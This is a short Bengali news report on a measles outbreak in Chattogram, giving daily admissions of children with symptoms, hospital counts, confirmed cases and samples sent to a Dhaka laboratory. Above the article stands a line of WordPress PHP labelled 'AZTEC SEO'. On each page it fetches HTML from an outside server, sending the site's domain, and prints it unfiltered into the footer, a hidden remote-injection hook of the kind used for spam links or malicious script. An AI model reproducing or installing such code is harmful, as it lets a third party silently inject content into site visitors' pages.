/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99);
চট্টগ্রাম নগরীতে হামের উপসর্গ নিয়ে একদিনে আরও ১৯ শিশু ভর্তি হয়েছে। রোববার (১২ এপ্রিল) চট্টগ্রাম জেলা সিভিল সার্জন কার্যালয়ের পক্ষ থেকে এ তথ্য জানানো হয়েছে।
একই দিনে সুস্থ হয়ে ১৫ শিশু বাড়ি ফিরে গেছে। বর্তমানে হাসপাতালে চিকিৎসাধীন রোগীর সংখ্যা ৮৪ জন। ভর্তিকৃত শিশুদের সবাই নগরীর বাসিন্দা। তবে ঢাকা থেকে রিপোর্ট না আসায় এ দিন নতুন করে হাম আক্রান্তের কোনো তথ্য জানাতে পারেনি সিভিল সার্জন কার্যালয়।
এদিকে চট্টগ্রাম নগরী ও উপজেলায় হাম আক্রান্তের সংখ্যা ৩৫ জনে দাঁড়িয়েছে। এর মধ্যে নগরীতে ২৪ জন এবং উপজেলায় ১১ জন। সর্বশেষ শনিবার উপজেলায় এক শিশুর শরীরে হাম শনাক্ত হয়।
সিভিল সার্জন কার্যালয় সূত্র জানায়, রোববার একদিনে নতুন করে ২৩ জনের নমুনা সংগ্রহ করে ঢাকার ন্যাশনাল পোলিও অ্যান্ড মিজেলস ল্যাবরেটরিতে পাঠানো হয়েছে। এ নিয়ে চট্টগ্রাম থেকে মোট ৩২৮ জনের নমুনা পাঠানো হয়েছে। এর মধ্যে নগরীর ২১৩ জন এবং উপজেলার ১১৫ জন রয়েছে।
চট্টগ্রাম জেলার সিভিল সার্জন ডা. জাহাঙ্গীর আলম বলেন, চট্টগ্রামে একদিনে হামের উপসর্গ নিয়ে হাসপাতালে ১৯ শিশু ভর্তি হয়েছে। তারা সবাই নগরীর বাসিন্দা। এ পর্যন্ত হাম আক্রান্ত শিশুর সংখ্যা ৩৫ জন। বর্তমানে উপসর্গ নিয়ে হাসপাতালে ভর্তি রয়েছে ৮৪ জন। তাদের প্রয়োজনীয় চিকিৎসা দেওয়া হচ্ছে।